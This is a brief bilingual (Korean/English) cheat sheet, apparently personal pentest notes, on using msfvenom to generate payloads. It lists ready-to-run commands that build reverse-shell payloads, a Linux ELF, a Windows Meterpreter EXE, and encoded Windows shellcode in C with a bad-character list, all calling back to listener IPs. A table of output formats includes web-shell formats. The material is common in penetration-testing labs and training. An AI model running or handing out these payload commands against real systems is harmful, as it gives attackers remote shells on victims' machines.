#metasploit #msfvenom #shellcode [[Encoder]] #payload ### Using msfvenom ```bash msfvenom -p <payload> LHOST=<IP> LPORT=<PORT> -f <FORMAT> -o <FILE_NAME> # Linux elf msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f elf -o shell.elf # Windows exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe -o shell.exe # Shellcode C msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.45.211 LPORT=4444 -e x86/alpha_mixed -f c ``` | 포맷 (`-f`) | 설명 | | --------------------------- | ----------------- | | `-b` | bad characters 제외 | | `-e` <encoder_name> | | | `elf` | 리눅스 실행 파일 | | `exe` | 윈도우 실행 파일 | | `c` | C 배열 형태 | | `python` | 파이썬 코드용 | | `raw` | 순수 쉘코드 바이너리 | | `hex` | 헥사 문자열 | | `asp`, `aspx`, `php`, `war` | 웹쉘 페이로드용 |